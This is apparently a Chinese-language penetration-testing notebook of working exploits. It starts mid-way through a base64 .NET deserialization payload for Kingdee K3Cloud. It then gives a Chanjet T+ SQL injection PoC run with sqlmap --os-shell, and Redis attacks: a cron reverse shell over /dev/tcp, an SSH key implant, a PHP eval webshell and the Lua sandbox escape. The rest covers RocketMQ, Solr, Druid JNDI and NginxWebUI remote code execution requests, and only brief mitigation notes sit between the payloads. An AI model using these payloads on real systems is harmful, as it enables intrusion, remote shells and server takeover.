XRlcmF0b3JgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYiAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAQAAAABwAAAAkDAAAACgkkAAAACggIAAAAAAoICAEAAAABEQAAAA8AAAAGJQAAAPUCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQFgAAAAcAAAAJBgAAAAkwAAAACTEAAAAKCAgAAAAACggIAQAAAAEXAAAADwAAAAYyAAAA7wFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAYAAAABwAAAAkHAAAACgk1AAAACggIAAAAAAoICAEAAAABGQAAAA8AAAAGNgAAAClTeXN0ZW0uV2ViLlVJLldlYkNvbnRyb2xzLlBhZ2VkRGF0YVNvdXJjZQQAAAAGNwAAAE1TeXN0ZW0uV2ViLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYRAaAAAABwAAAAkIAAAACAgAAAAACAgKAAAACAEACAEACAEACAgAAAAAARsAAAAPAAAABjkAAAApU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5EZXNpZ25lclZlcmIEAAAABjoAAABJU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAcAAAABQAAAA0CCTsAAAAICAMAAAAJCwAAAAEdAAAADwAAAAY9AAAANFN5c3RlbS5SdW50aW1lLlJlbW90aW5nLkNoYW5uZWxzLkFnZ3JlZ2F0ZURpY3Rpb25hcnkEAAAABj4AAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EB4AAAABAAAACQkAAAAQHwAAAAIAAAAJCgAAAAkKAAAAECAAAAACAAAABkEAAAAACUEAAAAEJAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCUIAAAAJQwAAAAEoAAAAJAAAAAlEAAAACUUAAAABLAAAACQAAAAJRgAAAAlHAAAAATAAAAAkAAAACUgAAAAJSQAAAAExAAAAJAAAAAlKAAAACUsAAAABNQAAACQAAAAJTAAAAAlNAAAAATsAAAAEAAAACU4AAAAJTwAAAARCAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BlAAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABlIAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGUwAAAARMb2FkCgRDAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQlTAAAACT4AAAAJUgAAAAZWAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZXAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgFEAAAAQgAAAAZYAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRUeXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZiAAAAhAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0GYwAAAA1HZXRFbnVtZXJhdG9yCgFHAAAAQwAAAAljAAAACT4AAAAJYgAAAAZmAAAARVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbU3lzdGVtLlR5cGVdIEdldEVudW1lcmF0b3IoKQZnAAAAlAFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0gR2V0RW51bWVyYXRvcigpCAAAAAoBSAAAAEIAAAAGaAAAAMACU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQm9vbGVhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZqAAAAHlN5c3RlbS5Db2xsZWN0aW9ucy5JRW51bWVyYXRvcgZrAAAACE1vdmVOZXh0CgFJAAAAQwAAAAlrAAAACT4AAAAJagAAAAZuAAAAEkJvb2xlYW4gTW92ZU5leHQoKQZvAAAAGVN5c3RlbS5Cb29sZWFuIE1vdmVOZXh0KCkIAAAACgFKAAAAQgAAAAZwAAAAvQJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABnIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZzAAAAC2dldF9DdXJyZW50CgFLAAAAQwAAAAlzAAAACT4AAAAJcgAAAAZ2AAAAGVN5c3RlbS5UeXBlIGdldF9DdXJyZW50KCkGdwAAABlTeXN0ZW0uVHlwZSBnZXRfQ3VycmVudCgpCAAAAAoBTAAAAEIAAAAGeAAAAMYBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGegAAABBTeXN0ZW0uQWN0aXZhdG9yBnsAAAAOQ3JlYXRlSW5zdGFuY2UKAU0AAABDAAAACXsAAAAJPgAAAAl6AAAABn4AAAApU3lzdGVtLk9iamVjdCBDcmVhdGVJbnN0YW5jZShTeXN0ZW0uVHlwZSkGfwAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQgAAAAKAU4AAAAPAAAABoAAAAAmU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbi5Db21tYW5kSUQEAAAACToAAAAQTwAAAAIAAAAJggAAAAgIACAAAASCAAAAC1N5c3RlbS5HdWlkCwAAAAJfYQJfYgJfYwJfZAJfZQJfZgJfZwJfaAJfaQJfagJfawAAAAAAAAAAAAAACAcHAgICAgICAgITE9J07irREYv7AKDJDyb3Cws=","format":"3"}

修复建议

8.x版本可通过手动添加安全配置并重启IIS的方式进行缓解，注意管理中心与普通应用配置文件均需添加：

# 普通应用配置：{WebROOT}\Kingdee\K3Cloud\WebSite\App_Data\Common.config
# 管理中心配置：{WebROOT}\Kingdee\K3Cloud\Services\ManagementService\App_Data\Common.config
 
EnabledKDSVCBinary = false

由于该漏洞不仅影响管理中心（默认8000端口），也影响普通应用（默认80端口）。如果其它版本通过限制访问来源临时缓解漏洞，需要考虑是否会中断普通用户Web业务。

升级修复方案

7.x版本必须先安装全量补丁（修复代码）后安装临时补丁（添加安全配置）

8.x版本管理中心（默认8000端口）默认不对外开放，且包含修复代码。但是直接安装临时补丁可能会失败，所以依旧建议先安装全量补丁（修复代码）后安装临时补丁（添加安全配置）

用友畅捷通T+SQL注入

语法

#fofa
app="畅捷通-TPlus"
#hunter
app.name="畅捷通 T+"

影响版本

畅捷通T+ 13.0
畅捷通T+ 16.0

poc

POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

保存这个数据包,用sqlmap打

python3 sqlmap.py -r shujubao.txt  --random-agent -v 3 --dbms mssql --hex --os-shell

POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
 
{"accNum": "3'", "functionTag": "SYS0104", "url": ""}





POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
 
{"accNum": "3' AND 5227 IN (SELECT (CHAR(97)+CHAR(97)+CHAR(97)+CHAR(97)+CHAR(97)+(SELECT (CASE WHEN (5227=5227) THEN CHAR(97) ELSE CHAR(97) END))+CHAR(97)+CHAR(97)+CHAR(97)+CHAR(97)+CHAR(97)))-- NCab", "functionTag": "SYS0104", "url": ""}

redis

计划任务反弹shell

redis以root身份运行

未授权访问或授权口令已知

在kali中通过redis-cli -h 192.168.100.101 -p 6379连接到redis，输入以下指令利用crontab反弹shell

# cron表达式格式：{秒数} {分钟} {小时} {日期} {月份} {星期} {年份(可为空)} 命令
# 每分钟执行一次echo "haha"：* * * * * echo "haha"
192.168.100.101:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.100.99/4444 0>&1\n"

# 设置目录为/var/spool/cron/
192.168.100.101:6379> config set dir /var/spool/cron/

# 设置文件名为root
192.168.100.101:6379> config set dbfilename root

# 保存快照到本地
192.168.100.101:6379> save

kali中打开一个新的命令行窗口执行nc -lvnp 4444进行监听，过一会儿就能接收到反弹回来的shell：

由于redis的压缩储存机制，在某些情况下会因为反弹shell的指令被压缩，从而导致反弹shell失败：

192.168.100.101:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.100.100/4444 0>&1\n"
192.168.100.101:6379> save

[root@localhost ~]# cat /var/spool/cron/root

bash -i &> /dev/tcp/192.168.100@/4 0>&1

当运行redis的用户为普通用户时，会无法出现切换目录失败的情况：

config set dir /var/spool/cron
(error) ERR Changing directory: Permission denied

SSH公钥

redis以root身份运行

未授权访问或者授权口令已知

服务开启ssh服务且允许密钥登录,并且存在/root/.ssh目录

在kali中使用ssh-keygen -t rsa生成密钥：

将生成的公钥保存到本地

┌──(root💀kali)-[/home/kali]
└─# (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > kali

将文件写入redis进行利用

# 将上一步生成的kali文件写入redis并设置键的值为kali
┌──(root💀kali)-[/home/kali]
└─# cat kali | redis-cli -h 192.168.100.101 -p 6379 -x set kali

# 连接redis，并将公钥文件写入/root/.ssh/authorized_keys中
┌──(root💀kali)-[/home/kali]
└─# redis-cli -h 192.168.100.101 -p 6379
192.168.100.101:6379> config set dir /root/.ssh/
192.168.100.101:6379> config set dbfilename authorized_keys
192.168.100.101:6379> save

# 使用密钥进行登录
┌──(root💀kali)-[/home/kali]
└─# ssh -i /root/.ssh/id_rsa root@192.168.100.101

文件写入

服务器开着web服务且web目录路径已知

未授权访问或者授权口令已知

倘若服务器运行着LAMP/LNMP服务，且已知工作目录为/var/www/html/，可通过以下指令写入webshell，或参考写入SSH公钥的过程写入木马文件

config set dir /var/www/html/
config set dbfilename shell.php
set xxx "\n\n\n<?php @eval($_POST['test']);?>\n\n\n"   //这里的\n\n\n代表换行的意思，用redis写入文件的会自带一些版本信息，如果不换行可能会导致无法执行.
save

主从复制rce

redis <= 5.0.5

未授权访问

https://github.com/n0b0dyCN/redis-rogue-server

python3 redis-rogue-server.py --rhost <target address> --rport <target port> --lhost <vps address> --lport <vps port>

参数说明

–rpasswd 如果目标Redis服务开启了认证功能，可以通过该选项指定密码
–rhost 目标redis服务IP
–rport 目标redis服务端口，默认为6379
–lhost vps的IP地址
–lport vps的端口，默认为21000

lua 沙盒绕过rce

cve-2022-0543

影响版本只限于ubuntu和debian

安全研究人员发现在 Debian 上，Lua 由 Redis 动态加载，且在 Lua 解释器本身初始化时，module和require以及package的Lua 变量存在于上游Lua 的全局环境中，而不是不存在于 Redis 的 Lua 上，并且前两个全局变量在上个版本中被清除修复了，而package并没有清楚，所以导致redis可以加载上游的Lua全局变量package来逃逸沙箱。

利用luaopen_io函数，执行代码：

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); 
local io = io_l(); 
local f = io.popen("id", "r"); 
local res = f:read("*a"); 
f:close(); 
return res' 0

前提都是需要知道package.loadlib的路径。

防御

绑定本地和内网ip地址进行访问,如本地ip：127.0.0.1，192.168.54.1
requirepass设置redis密码，（默认为空）
保护模式开启protected-mode开启（默认开启）
更改默认端口（6379）
避免使用root权限使用

apache

Apache RocketMQ NameServer cve-2023-33246

CVE-2023-37582 中，由于对 CVE-2023-33246 修复不完善，导致在Apache RocketMQ NameServer 存在未授权访问的情况下，攻击者可构造恶意请求以RocketMQ运行的系统用户身份执行命令。

CVE-2023-37582 中，由于对 CVE-2023-33246 修复不完善，RocketMQ 5.1.0 及以下版本在一定条件下存在远程命令执行风险。RocketMQ的 NameServer、Broker、Controller 等多个组件暴露在外网且缺乏权限验证，攻击者可以利用此缺陷通过「更新配置」功能修改配置路径，进而以系统用户身份执行任意命令（伪造 RocketMQ 协议也可执行任意命令）。

影响版本

5.0.0 <= Apache RocketMQ <= 5.1.0
4.0.0 <= Apache RocketMQ <= 4.9.5

exp

python3 check.py --ip 127.0.0.1 --port 9876
python3 check.py --cidr 192.168.1.0/24
# or 
python3 check.py --file rocketmq_targets.txt --port 9876
# target in file format:
# ip
# ip:port
# http://ip:port

https://github.com/SuperZero/CVE-2023-33246
#使用方法
java -jar CVE-2023-33246.jar -ip "127.0.0.1" -cmd "注入的命令"

CVE-2023-37582

poc

import socket
import binascii
client = socket.socket()

# you ip
client.connect(('192.168.222.130',9876))

# data
json = '{"code":318,"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
body='configStorePath=/tmp/test.txt\nproductEnvName=123\\ntest'.encode('utf-8')
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2) # 一个字节是2个十六进制数
head1 = '00000000'+str(hex(json_lens))[2:]      # hex(xxxx) 0x1243434 去掉 0x
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')

# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)

成功后将会在在 tmp 目录下的 test.txt 文件中写入指定字符串 test

Apache Flink RCE

影响版本

Apache Flink <= 1.9.1

poc

直接上传jar木马连接

Apache Solr 代码执行漏洞

CNVD-2023-27598

Solr 以 Solrcloud 模式启动且可出网时，未经身份验证的远程攻击者可以通过发送特制的数据包进行利用，最终在目标系统上远程执行任意代码。

影响版本

8.10.0 <= Apache Solr < 9.2.0

利用方法：
使用postCommit来命令执行

POST /solr/demo/config HTTP/1.1
Host: 192.168.1.92:8983
Content-Length: 180
Content-Type: application/json

{"add-listener":{"event":"postCommit","name":"suiyi","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/192.168.1.92/6666 0>&1"]}}

通过newSearcher命令执行

POST /solr/demo/config HTTP/1.1
Host: 192.168.1.92:8983
Content-Length: 170
Content-Type: application/json

{"add-listener":{"event":"newSearcher","name":"newSearcher3","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 3 x9hr3z.dnslog.cn"]}}

修复建议
如果未使用 ConfigSets API，请禁用 UPLOAD 命令，将系统属性： configset.upload.enabled 设置为 false ，详细参考： https://lucene.apache.org/solr/guide/8_6/configsets-api.html
使用身份验证/授权，详细参考：https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plu
gins.html
官方已发布漏洞补丁及修复版本，请评估业务是否受影响后，酌情升级至安全版本：
https://github.com/apache/solr/releases/tag/releases/solr/9.2.0

Apache Druid 远程代码执行漏洞

QVD-2023-9629

该漏洞源于 Apache Kafka Connect JNDI 注入漏洞(CVE-2023-25194)，Apache Druid 由于支持从 Kafka 加载数据，刚好满足其利用条件，攻击者可通过修改Kafka 连接配置属性进行 JNDI 注入攻击，进而在服务端执行任意恶意代码。

影响版本

Apache Druid <= 25.0.0

poc

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1437
Connection: close

{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"1.1.1.1:9092",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://x.x.x.x\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic":"any",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\\s\\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{

},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}

user.provider.url处填写你的恶意ldap服务url
修复建议

避免 Apache Druid 开放至公网。
开启身份认证机制,可参考官方文档：https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html

NginxWebUI runCmd 远程代码执行漏洞

CVE-2023-33246

该漏洞源于开发人员没有对 runCmd 接口处传入的参数进行有效过滤，攻击者可在无需登录的情况下绕过路由权限校验，通过拼接语句的方式执行任意命令，最终控制服务器

影响版本

nginxWebUI < 3.5.1（v3.5.1 版本修复了登陆绕过漏洞，但是 RCE 漏洞在最新版本（v3.6.5）中仍可绕过防护进行利用）

poc

GET /AdminPage/conf/runCmd?cmd=执行的命令%26%26echo%20nginx HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
